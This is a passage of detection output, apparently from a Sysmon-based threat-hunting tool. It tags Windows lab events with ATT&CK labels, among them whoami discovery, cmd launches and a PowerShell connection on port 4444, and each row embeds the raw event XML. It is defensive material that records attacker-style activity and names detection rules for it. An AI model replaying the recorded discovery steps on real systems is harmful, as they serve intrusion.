<Data Name=""ParentImage"">C:\Windows\System32\CompMgmtLauncher.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\CompMgmtLauncher.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1561018078.816185,2019-06-20T12:07:58.816185+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-20T08:07:52.956810Z"">
</TimeCreated>
<EventRecordID>8119</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2020"" ThreadID=""2088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-20 08:07:52.956</Data>
<Data Name=""ProcessGuid"">365ABB72-3ED8-5D0B-0000-0010398F1A00</Data>
<Data Name=""ProcessId"">1476</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-3991-5D0B-0000-002029350100</Data>
<Data Name=""LogonId"">0x13529</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3ED4-5D0B-0000-0010B2871A00</Data>
<Data Name=""ParentProcessId"">1440</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;cmd&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /groups) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:48.290682Z"">
</TimeCreated>
<EventRecordID>17715</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:48.290</Data>
<Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-00103A6B1300</Data>
<Data Name=""ProcessId"">2676</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /groups</Data>
<Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
<Data Name=""LogonId"">0x13587</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
<Data Name=""ParentProcessId"">2016</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /groups ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:48.290682Z"">
</TimeCreated>
<EventRecordID>17715</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:48.290</Data>
<Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-00103A6B1300</Data>
<Data Name=""ProcessId"">2676</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /groups</Data>
<Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
<Data Name=""LogonId"">0x13587</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
<Data Name=""ParentProcessId"">2016</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435978.659405,2019-07-30T01:32:58.659405+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:32:57.633157Z"">
</TimeCreated>
<EventRecordID>4887</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:32:57.600</Data>
<Data Name=""ProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ProcessId"">1208</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6056-5D3F-0000-0010C9EF4100</Data>
<Data Name=""ParentProcessId"">4600</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:08.143703Z"">
</TimeCreated>
<EventRecordID>342417</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:08.141</Data>
<Data Name=""ProcessGuid"">747F3D96-E940-5F33-0000-001039310F00</Data>
<Data Name=""ProcessId"">7460</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E93C-5F33-0000-0010A6F00E00</Data>
<Data Name=""ParentProcessId"">8032</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1561018072.95681,2019-06-20T12:07:52.956810+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 38208 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-20T08:07:50.378685Z"">
</TimeCreated>
<EventRecordID>8118</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2020"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-20 08:07:48.721</Data>
<Data Name=""ProcessGuid"">365ABB72-3D05-5D0B-0000-001004220D00</Data>
<Data Name=""ProcessId"">816</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">false</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.13</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">4444</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.18</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">38208</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1590282859.005259,2020-05-24T05:14:19.005259+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-24T01:13:54.120170Z"">
</TimeCreated>
<EventRecordID>196375</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2812"" ThreadID=""3656"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-24 01:13:54.117</Data>
<Data Name=""ProcessGuid"">747F3D96-CA52-5EC9-0000-001027FA3700</Data>
<Data Name=""ProcessId"">4456</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-BDD1-5EC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-CA4E-5EC9-0000-00109FE23700</Data>
<Data Name=""ParentProcessId"">1516</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564903596.239723,2019-08-04T11:26:36.239723+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T07:26:35.182896Z"">
</TimeCreated>
<EventRecordID>5637</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 07:26:35.116</Data>
<Data Name=""ProcessGuid"">747F3D96-88AB-5D46-0000-001081ED7D03</Data>
<Data Name=""ProcessId"">4300</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-88AA-5D46-0000-001093E37D03</Data>
<Data Name=""ParentProcessId"">4644</Data>
<Data Name=""ParentImage"">C:\Windows\System32\dllhost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot;) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-02T18:01:57.418442Z"">
</TimeCreated>
<EventRecordID>110435</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3068"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-02 18:01:57.417</Data>
<Data Name=""ProcessGuid"">747F3D96-B595-5EAD-0000-00106BFDC200</Data>
<Data Name=""ProcessId"">6004</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
<Data Name=""ParentProcessId"">1428</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,User Name : ( NT AUTHORITY\SYSTEM ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-02T18:01:57.418442Z"">
</TimeCreated>
<EventRecordID>110435</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3068"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-02 18:01:57.417</Data>
<Data Name=""ProcessGuid"">747F3D96-B595-5EAD-0000-00106BFDC200</Data>
<Data Name=""ProcessId"">6004</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-6ABB-5EAD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B592-5EAD-0000-0010D4CDC200</Data>
<Data Name=""ParentProcessId"">1428</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:04.075706Z"">
</TimeCreated>
<EventRecordID>342416</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:04.074</Data>
<Data Name=""ProcessGuid"">747F3D96-E93C-5F33-0000-0010A6F00E00</Data>
<Data Name=""ProcessId"">8032</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E93B-5F33-0000-001003BA0E00</Data>
<Data Name=""ParentProcessId"">7920</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wermgr.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wermgr.exe -upload</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /name Microsoft.BackupAndRestoreCenter ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
